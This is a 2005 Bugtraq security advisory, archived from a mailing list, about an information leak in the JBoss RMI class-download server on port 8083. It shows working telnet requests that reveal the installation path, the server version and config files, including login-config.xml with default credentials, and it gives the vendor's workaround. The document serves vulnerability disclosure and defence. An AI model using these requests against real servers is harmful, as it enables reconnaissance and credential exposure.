JBOSS 3.2.2-3.2.7 / 4.0.2 installation path disclosure / config disclosure / version fingerprinting

To: "Bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: JBOSS 3.2.2-3.2.7 / 4.0.2 installation path disclosure / config disclosure / version fingerprinting
From: Marc Schoenefeld <marc.schoenefeld@xxxxxxx>
Date: Fri, 17 Jun 2005 23:45:08 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)

Security Advisory: JBOSS 3.2.2-3.2.7 / 4.0.2 installation pathdisclosure / config disclosure / version fingerprinting

Date:  14/06/05
URL: http://www.illegalaccess.org/java/jboss_path.php

Problem:

The default installation of JBoss reveals the path of the installationdirectory andallows fingerprinting of the server software version by anunauthenticated HTTP request.This is due to an information leak bug in the org.jboss.web.WebServerclass.Unfortunately the JBoss developers did not follow the pattern ofsoftware reuse

and invented their own webserver for RMI code download. The implementation
when confronted with an expected HTTP request such as 'GET %.' reveals

system platform information useful for an attacker. Due to theclassloader architecturethe RMI class download service on port 8083 also allows an attacker tofingerprintthe version of the JBoss server and with version 4.0.2 to download allconfig files such

as the security settings from the /conf directory.

Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0

Reply:

HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriffverweigert)

Content-Type: text/html

Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy  HTTP/1.0

Replz>

HTTP/1.0 200 OK
Content-Length: 550
Content-Type: text/html

///====================================================================== ///////

//  JBoss Security Policy                                       //
//                                                                      //

///====================================================================== ///


// $Id: server.policy,v 1.4 2003/08/27 04:31:53 patriot1burke Exp $
grant {
          // Allow everything for now
permission java.security.AllPermission;
};
Verbindung zu Host verloren.

Example 3 (Login config disclosure): [3.2.x and 4.0.2]:
Request
>> telnet [jbosshost] 8083
>> GET %login-config.xml

HTTP/1.0 200 OK
Content-Length: 6692
Content-Type: text/html
<?xml version='1.0'?>
<!DOCTYPE policy PUBLIC
   "-//JBoss//DTD JBOSS Security Config 3.0//EN"
   "http://www.jboss.org/j2ee/dtd/security_config.dtd";>
[...]
 <!-- Security domains for testing new jca framework -->
 <application-policy name = "HsqlDbRealm">
    <authentication>

<login-module code ="org.jboss.resource.security.ConfiguredIdentityLoginModule"

          flag = "required">
          <module-option name = "principal">sa</module-option>
          <module-option name = "userName">sa</module-option>
          <module-option name = "password"></module-option>

<module-option name ="managedConnectionFactoryName">jboss.jca:service=LocalTxCM,name=DefaultDS</module-option>

       </login-module>
    </authentication>
 </application-policy>

 <application-policy name = "JmsXARealm">
    <authentication>

<login-module code ="org.jboss.resource.security.ConfiguredIdentityLoginModule"

          flag = "required">
          <module-option name = "principal">guest</module-option>
          <module-option name = "userName">guest</module-option>
          <module-option name = "password">guest</module-option>

<module-option name ="managedConnectionFactoryName">jboss.jca:service=TxCM,name=JmsXA</module-option>

       </login-module>
    </authentication>
 </application-policy>
[...]


Example 4 (Version fingerprint): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %org/jboss/version.properties HTTP/1.0

Reply:
HTTP/1.0 200 OK
Content-Length: 1138
Content-Type: text/html

###====================================================================== ######### Holds version properties forJBoss. ##

##                                                                  ##

##====================================================================== ###

### $Id: version.properties,v 1.1.26.1 2004/10/17 21:20:13 starksm Exp $###


# The version of the server
version.major=4
version.minor=0
version.revision=2
version.tag=
version.name=Zion
version.cvstag=JBoss_4_0_2

# Build identifiers
build.number=200505022023

[and so on]

Severity:
Risk of information leakage.

Workaround:

The JBoss group was contacted on 6/12/05 and reacted with the suggestionto completely disable thedownload of server classes. But this brutal fix severely damages thefunctionality and usefulnessof the application server :-( . It seems that they do not consider thisto be a bug that needsa fix. I leave this uncommented... but anyway the following XML snippetsdemonstrates their fix...


<mbean code="org.jboss.web.WebService"
   name="jboss:service=WebService">
   <attribute name="Port">8083</attribute>
   <!-- Should resources and non-EJB classes be downloadable -->
<!-- old      <attribute name="DownloadServerClasses">true</attribute>  -->

 <attribute name="DownloadServerClasses">false</attribute><attribute name="Host">${jboss.bind.address}</attribute>

   <attribute name="BindAddress">${jboss.bind.address}</attribute>
</mbean>

Prev by Date: [ GLSA 200506-13 ] webapp-config: Insecure temporary file handling
Next by Date: Source Code Disclosure in Yaws Webserver <1.56
Previous by thread: [ GLSA 200506-13 ] webapp-config: Insecure temporary file handling
Next by thread: Source Code Disclosure in Yaws Webserver <1.56
Index(es):
- Date
- Thread